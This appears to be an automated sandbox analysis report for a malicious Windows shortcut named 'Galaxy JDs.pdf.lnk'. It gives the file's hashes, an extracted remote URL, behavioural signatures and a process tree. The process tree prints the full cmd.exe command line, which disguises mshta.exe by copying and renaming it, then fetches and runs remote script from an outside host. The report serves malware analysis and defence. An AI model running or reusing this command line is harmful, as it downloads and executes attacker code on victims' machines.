Analysis
-
max time kernel
394s -
max time network
867s -
platform
windows10-1703_x64 -
resource
win10-20220901-en -
resource tags
arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system -
submitted
26-09-2022 11:25
Static task
static1
Behavioral task
behavioral1
Sample
Galaxy JDs.pdf.lnk
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
Galaxy JDs.pdf.lnk
Resource
win10-20220901-en
General
-
Target
Galaxy JDs.pdf.lnk
-
Size
363KB
-
MD5
8878ee5d935facff0e04370324118c60
-
SHA1
e09eda6f9ee4d2e30e239813e87423472d893396
-
SHA256
3b70c3ebffcfd6a97859f8d9e5a31f6902756e23fd6688ca7c7446d24ec76d9d
-
SHA512
e9e8e82126ee4e4a87b39ce60f48155724a8577c95e664de2e3d3c05e70f02bf30454d023832a58560befb695c359dd244923e929ded4414f9d0f93061343e46
-
SSDEEP
6144:pPISi7Naj5ng6erydYtQfBpeSLh1J7qLESnJmlfYHeaSuNcVD8payTq6Z:pwSiKeryu2fBpe+R7q5JmlJui6pay2e
Malware Config
Extracted
https://fs.digiboxes.us/yq7dpQeWf6Bbu6jZsRiT8UdhrIB08fQGBxDPNulbHbg=
Signatures
-
Blocklisted process makes network request 4 IoCs
Processes:
mshta.exeflow pid process 2 4176 mshta.exe 4 4176 mshta.exe 6 4176 mshta.exe 8 4176 mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
cmd.execmd.exedescription pid process target process PID 4680 wrote to memory of 4904 4680 cmd.exe cmd.exe PID 4680 wrote to memory of 4904 4680 cmd.exe cmd.exe PID 4904 wrote to memory of 4176 4904 cmd.exe mshta.exe PID 4904 wrote to memory of 4176 4904 cmd.exe mshta.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Galaxy JDs.pdf.lnk"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /q /c type C:\Windows\system32\msh*.exe>C:\Users\Public\msh&ren C:\Users\Public\* *ta.exe&for %i IN (C:\Users\Public\ms*.exe) DO start /b %~ni "https://fs.digiboxes.us/yq7dpQeWf6Bbu6jZsRiT8UdhrIB08fQGBxDPNulbHbg="2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exemshta "https://fs.digiboxes.us/yq7dpQeWf6Bbu6jZsRiT8UdhrIB08fQGBxDPNulbHbg="3⤵
- Blocklisted process makes network request